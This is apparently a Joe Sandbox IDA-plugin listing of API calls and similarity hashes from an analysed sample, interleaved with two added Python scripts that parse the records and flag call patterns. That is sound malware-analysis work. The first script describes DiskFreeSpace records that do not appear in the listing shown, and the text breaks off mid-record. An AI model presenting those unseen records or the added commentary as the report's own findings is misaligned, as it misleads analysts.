• Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
• Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• API String ID: 943502515-3724388283
• Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
• Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
• SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
• SetErrorMode.KERNEL32(?), ref: 0045D35C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ErrorMode$LabelVolume
• String ID: \VH
• API String ID: 2006950084-234962358
• Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
• Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
• Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
• Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
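Added example (Python, not part of the Joe Sandbox report or its IDA plugin): a small parser for the function records in this listing, plus two checks a reviewer typically wants over them. The first flags functions that bracket a disk or volume query with SetErrorMode calls, the idiom shared by the ErrorMode$DiskFreeSpace, ErrorMode$InformationVolume and ErrorMode$LabelVolume records above (SetErrorMode(00000001) is SEM_FAILCRITICALERRORS, which stops a drive probe from blocking on a "no disk in drive" dialog). The second compares Instruction Fuzzy Hashes nibble by nibble to find near-duplicate functions, such as the two DiskFreeSpace records whose hashes differ in only a few positions. SAMPLE is a constructed excerpt of three records from the listing, trimmed to the fields the script reads; the helper names, the distance threshold and the treatment of the fuzzy hash as a positional digest are assumptions made here.

```python
"""Parse Joe Sandbox IDA-plugin function records and compare the functions.
Added example, not from the Joe Sandbox report: the record layout is the page's
own, SAMPLE is a constructed excerpt of three records from the listing (trimmed
to the fields read here), and the helper names are ours."""
import re
from itertools import combinations

SAMPLE = r"""
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional (args), then "ref: <va>". Lines without parentheses also match.
API_RE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
FIELD_RE = re.compile(r"•\s*(API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*?)\s*$")


def parse_records(text):
    """Split the listing at each 'APIs' header; return one dict per function."""
    records = []
    for chunk in re.split(r"^\s*APIs\s*$", text, flags=re.M):
        if not chunk.strip():
            continue
        rec = {"apis": [], "fields": {}}
        for line in chunk.splitlines():
            m = API_RE.search(line)
            if m:
                rec["apis"].append({"api": m["api"], "module": m["mod"],
                                    "ref": m["ref"].upper(), "subcall": m["sub"] is not None,
                                    "args": m["args"].split(",") if m["args"] else []})
                continue
            m = FIELD_RE.search(line)
            if m:
                rec["fields"][m[1]] = m[2]
        records.append(rec)
    return records


def brackets_with_set_error_mode(rec):
    """True when the function's own calls start and end with SetErrorMode and the
    first passes 1 (SEM_FAILCRITICALERRORS): the report's volume and disk queries
    use this so a drive probe cannot block on a 'no disk' dialog. Subcalls ignored."""
    calls = [a for a in rec["apis"] if not a["subcall"]]
    if len(calls) < 3 or calls[0]["api"] != "SetErrorMode" or calls[-1]["api"] != "SetErrorMode":
        return False
    work = [a for a in calls[1:-1] if a["api"] != "SetErrorMode"]
    return calls[0]["args"][:1] == ["00000001"] and bool(work)


def fuzzy_distance(h1, h2):
    """Nibble-wise Hamming distance between two Instruction Fuzzy Hashes.
    Assumption: Joe Sandbox does not document the hash, so it is treated as a
    positional digest; enough to spot records that differ in only a few nibbles."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes differ in length; not comparable")
    return sum(a != b for a, b in zip(h1.upper(), h2.upper()))


def near_duplicates(records, max_distance=10):
    """Pairs of records sharing an API ID whose hashes are within max_distance."""
    pairs = []
    for r1, r2 in combinations(records, 2):
        f1, f2 = r1["fields"], r2["fields"]
        if f1.get("API ID") != f2.get("API ID"):
            continue
        d = fuzzy_distance(f1["Instruction Fuzzy Hash"], f2["Instruction Fuzzy Hash"])
        if d <= max_distance:
            pairs.append((f1["Opcode ID"][:8], f2["Opcode ID"][:8], d))
    return pairs


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("near-duplicates:", near_duplicates(recs))
    print("SetErrorMode-wrapped:", [r["apis"][0]["ref"] for r in recs if brackets_with_set_error_mode(r)])
```

On the report's own records this pairs the two ErrorMode$DiskFreeSpace functions at 8 differing nibbles out of 70 and reports both as SetErrorMode-wrapped; the CLSIDFromString record is neither. The distance threshold is a judgement call, and two records with different API IDs are never paired even if their hashes are close.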
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                    • DrawMenuBar.USER32 ref: 00449761
                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
APIs
Strings
Similarity
• API ID: _wcslen$_wcscpy
• String ID: 3, 3, 8, 1
• API String ID: 3469035223-357260408
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• VariantInit.OLEAUT32(?), ref: 0047950F
• SysAllocString.OLEAUT32(00000000), ref: 004795D8
• VariantCopy.OLEAUT32(?,?), ref: 0047960F
• VariantClear.OLEAUT32(?), ref: 00479650
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                    • __itow.LIBCMT ref: 004699CD
                                                                                                                      • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                    • __itow.LIBCMT ref: 00469A97
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3379773720-0
                                                                                                                    • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                    • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                    • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                    • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3880355969-0
                                                                                                                    • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                    • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                    • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                    • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2782032738-0
                                                                                                                    • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                    • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                    • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                    • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                    • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                    • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                    APIs
                                                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                    • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                    • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                    • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
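The blocks above give, for each function the static disassembly found in the main module's memory dump (Offset 00400000), the API call sites with their arguments and ref addresses, plus the similarity hashes; the Instruction Fuzzy Hash differs from function to function, while in these blocks the Opcode ID and the Opcode Fuzzy Hash carry the same value. Working through a long listing of this kind is easier as data than as a page. The Python script below is an added example and is not part of the Joe Sandbox report: it parses these blocks into per-function records and flags ordered API sequences, such as CreateHardLinkW, DeleteFileW, CreateHardLinkW at 0045D248..0045D2AA, which is consistent with a retry of the hard-link creation after removing an existing target. SAMPLE_LISTING is a constructed excerpt of the lines above with the page indentation removed; the PATTERNS table and the subsequence matching are the editor's assumptions, not something the report computes.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed excerpt: three function blocks copied from the listing above,
# indentation removed and some Similarity lines trimmed.
SAMPLE_LISTING = """\
APIs
• SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
• __itow.LIBCMT ref: 004699CD
  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
• SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
• __itow.LIBCMT ref: 00469A97
Similarity
• API ID: MessageSend$__itow
• Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
APIs
• GetWindowRect.USER32(?,?), ref: 00449A4A
• ScreenToClient.USER32(?,?), ref: 00449A80
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
Similarity
• API ID: Window$ClientMoveRectScreen
• Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
"""

# "• Name.MODULE(args), ref: ADDR"; parens are absent on CRT lines such as __itow.LIBCMT.
CALL_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
META_RE = re.compile(r"^(?:•\s*)?(?P<key>[\w ]+?):\s*(?P<value>.*)$")  # "Key: value" lines

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # call-site address in the dump, not the function entry
    subcall_of: Optional[int] = None  # address named in "Part of subcall function", if any

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)

    def sequence(self, include_subcalls: bool = False) -> List[str]:
        """API names in call-site order; subcall lines are left out by default."""
        return [c.name for c in self.calls if include_subcalls or c.subcall_of is None]

def parse_listing(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":            # every function block opens with this header
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line:
            continue
        call = CALL_RE.match(line)    # tried first: call lines also contain a colon
        if call:
            args = [a for a in call["args"].split(",") if a] if call["args"] is not None else []
            sub = int(call["sub"], 16) if call["sub"] else None
            current.calls.append(ApiCall(call["name"], call["module"], args, int(call["ref"], 16), sub))
            continue
        meta = META_RE.match(line)    # section headers have no colon and are skipped here
        if meta:
            current.meta[meta["key"]] = meta["value"].strip()
    return records

def contains_sequence(calls: List[str], pattern: List[str]) -> bool:
    """True when pattern occurs in calls in that order; other calls may sit between."""
    it = iter(calls)
    return all(any(name == wanted for name in it) for wanted in pattern)

# Ordered call patterns to hunt for; an analyst's assumption, not something the
# report flags. Only the first one occurs in the excerpt.
PATTERNS = {
    "hardlink-replace": ["CreateHardLinkW", "DeleteFileW", "CreateHardLinkW"],
    "message-pump": ["PeekMessageW", "TranslateMessage", "DispatchMessageW"],
}

def flag_records(records: List[FunctionRecord]) -> List[Tuple[int, str, str]]:
    """(record index, pattern label, Instruction Fuzzy Hash) for each matching function."""
    hits = []
    for idx, rec in enumerate(records):
        for label, pattern in PATTERNS.items():
            if contains_sequence(rec.sequence(), pattern):
                hits.append((idx, label, rec.meta.get("Instruction Fuzzy Hash", "")))
    return hits

if __name__ == "__main__":
    for idx, label, fuzzy in flag_records(parse_listing(SAMPLE_LISTING)):
        print(f"function #{idx}: {label}, Instruction Fuzzy Hash {fuzzy}")
```

Run it against the text of the whole report rather than the excerpt to get every function block; only the "APIs" and "Key: value" line shapes shown above are handled, so a block whose lines were fused by extraction (for example the "Associated" lines with a trailing download-link label) is parsed only as far as its colon-separated keys go. The Instruction Fuzzy Hash carried in each hit is the value to compare across samples, since it is the one that varies per function in this listing.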
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
